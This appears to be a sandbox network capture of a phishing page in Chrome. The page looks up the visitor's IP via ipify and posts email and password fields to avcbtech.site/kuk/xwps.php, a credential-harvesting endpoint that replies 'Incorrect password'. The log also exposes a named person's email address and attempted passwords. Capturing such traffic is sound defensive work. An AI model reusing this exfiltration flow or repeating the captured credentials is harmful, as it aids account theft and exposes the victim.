2025-03-25 16:13:16 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:30 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:30 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:13:30 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb227fc24adca-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104570&min_rtt=104340&rtt_var=22356&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=35469&cwnd=252&unsent_bytes=0&cid=2a45bbb4161fec75&ts=273&x=0"
2025-03-25 16:13:30 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	104.26.13.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:30 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:30 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:13:30 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb22bbba54321-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105918&min_rtt=104400&rtt_var=23609&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=35678&cwnd=247&unsent_bytes=0&cid=4a77468e43be4f7f&ts=271&x=0"
2025-03-25 16:13:30 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49751	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:36 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:37 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:13:37 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb2536b3a42a3-EWR server-timing: cfL4;desc="?proto=TCP&rtt=106193&min_rtt=104377&rtt_var=24752&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=33900&cwnd=251&unsent_bytes=0&cid=3c5ab6faae73e12c&ts=277&x=0"
2025-03-25 16:13:37 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:37 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 62 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:37 UTC	62	OUT	Data Raw: 61 69 3d 72 65 62 65 63 63 61 2e 6b 61 72 70 69 6e 6f 73 25 34 30 6a 75 6e 6b 6c 65 73 73 66 6f 6f 64 73 2e 63 6f 6d 26 70 72 3d 33 64 21 5a 47 39 42 43 25 37 44 50 59 73 28 65 25 37 42 Data Ascii: ai=rebecca.karpinos%40junklessfoods.com&pr=3d!ZG9BC%7DPYs(e%7B
2025-03-25 16:13:48 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:13:37 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=bae0e4146ef85e7efa56d4d628d71cb6; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:13:48 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	104.26.13.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:37 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:37 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:13:37 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb25699cf182d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104860&min_rtt=104688&rtt_var=22345&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=35407&cwnd=245&unsent_bytes=0&cid=7b8348e1397690c7&ts=269&x=0"
2025-03-25 16:13:37 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49753	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:49 UTC	389	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:49 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:13:49 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:13:49 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49757	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:04 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 54 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:04 UTC	54	OUT	Data Raw: 61 69 3d 72 65 62 65 63 63 61 2e 6b 61 72 70 69 6e 6f 73 25 34 30 6a 75 6e 6b 6c 65 73 73 66 6f 6f 64 73 2e 63 6f 6d 26 70 72 3d 37 6b 50 34 48 28 69 69 30 56 38 Data Ascii: ai=rebecca.karpinos%40junklessfoods.com&pr=7kP4H(ii0V8
2025-03-25 16:14:15 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:04 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=7a466eb26fee73dcd60cd8975db36591; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:14:15 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49759	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:05 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:05 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:05 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb305cd24624e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105963&min_rtt=104000&rtt_var=24895&sent=6&recv=8&lost=0&retrans=1&sent_bytes=2816&recv_bytes=1121&delivery_rate=33867&cwnd=232&unsent_bytes=0&cid=ad2c7dbce99f0d54&ts=267&x=0"
2025-03-25 16:14:05 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49760	104.26.13.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:06 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:06 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:06 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb308ccfb8186-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104423&min_rtt=103954&rtt_var=22648&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=35321&cwnd=233&unsent_bytes=0&cid=29651025cadceb35&ts=308&x=0"
2025-03-25 16:14:06 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:16 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
2025-03-25 16:14:16 UTC	495	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:16 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:14:16 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49769	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:26 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 43 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:26 UTC	43	OUT	Data Raw: 61 69 3d 72 65 62 65 63 63 61 2e 6b 61 72 70 69 6e 6f 73 25 34 30 6a 75 6e 6b 6c 65 73 73 66 6f 6f 64 73 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=rebecca.karpinos%40junklessfoods.com&pr=
